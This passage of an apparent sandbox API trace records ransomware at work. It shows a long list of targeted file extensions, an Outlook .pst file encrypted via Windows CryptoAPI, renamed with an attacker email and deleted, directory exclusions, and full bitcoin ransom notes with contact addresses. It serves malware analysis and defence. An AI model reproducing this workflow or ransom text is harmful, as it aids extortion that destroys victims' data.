db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pst") returned=".pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0187.243] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.243] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.243] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0187.272] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x42400, lpOverlapped=0x0) returned 1
	[0187.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.293] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcaf78) returned 1
	[0187.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.295] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0187.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.295] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0187.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.296] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9230) returned 1
	[0187.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.296] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x42400, dwBufLen=0x42400 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x42410) returned 1
	[0187.368] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.368] RtlMoveMemory (in: Destination=0x101f588, Source=0xfdd180, Length=0x42400 | out: Destination=0x101f588) 
	[0187.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.368] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x101f588*, pdwDataLen=0x18aefc*=0x42400, dwBufLen=0x42410 | out: pbData=0x101f588*, pdwDataLen=0x18aefc*=0x42410) returned 1
	[0187.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.375] CryptDestroyKey (hKey=0xfb9230) returned 1
	[0187.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.376] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0187.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.376] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0187.376] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.376] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.377] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0187.378] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0187.378] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0187.381] WriteFile (in: hFile=0x388, lpBuffer=0x101f588*, nNumberOfBytesToWrite=0x42410, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x101f588*, lpNumberOfBytesWritten=0x18b358*=0x42410, lpOverlapped=0x0) returned 1
	[0187.407] CloseHandle (hObject=0x388) returned 1
	[0187.407] CloseHandle (hObject=0x2c0) returned 1
	[0187.407] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst")) returned 1
	[0187.449] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst")) returned 0
	[0187.449] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x8866b39a, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 0
	[0187.450] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0187.450] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0187.450] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files"
	[0187.450] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*"
	[0187.451] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.451] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.451] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0187.451] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.456] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0187.456] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0187.459] CloseHandle (hObject=0x384) returned 1
	[0187.460] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.461] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0187.463] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0187.463] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.464] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0187.465] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0187.465] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0187.465] CloseHandle (hObject=0x384) returned 1
	[0187.465] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.466] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.466] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0187.466] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0187.466] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.466] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0187.467] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0187.470] CloseHandle (hObject=0x384) returned 1
	[0187.471] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.471] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.472] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0187.477] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.477] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0187.478] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0187.478] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0187.478] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0187.478] CloseHandle (hObject=0x384) returned 1
	[0187.479] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x893bee94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x894577ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0187.480] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*") returned 49
	[0187.481] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.481] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*") returned 0x31
	[0187.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.481] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="windows") returned 0x0
	[0187.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.481] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="boot") returned 0x0
	[0187.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.482] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="system volume information") returned 0x0
	[0187.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.482] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0187.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.482] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="temp") returned 0x0
	[0187.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.483] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="program files") returned 0x0
	[0187.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.483] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="program files (x86)") returned 0x0
	[0187.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.483] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="appdata") returned 0x0
	[0187.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="application data") returned 0x0
	[0187.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="winnt") returned 0x0
	[0187.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="tmp") returned 0x0
	[0187.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="cache") returned 0x0
	[0187.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="temporary internet files") returned 0x0
	[0187.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="webcache") returned 0x0
	[0187.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="inetcache") returned 0x0
	[0187.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="nvidia") returned 0x0
	[0187.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="packages") returned 0x0
	[0187.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.487] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="cookies") returned 0x0
	[0187.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.487] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\*.*", lpSrch="programdata") returned 0x0
	[0187.487] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0187.487] lstrcmpW (lpString1=".", lpString2=".") returned 0
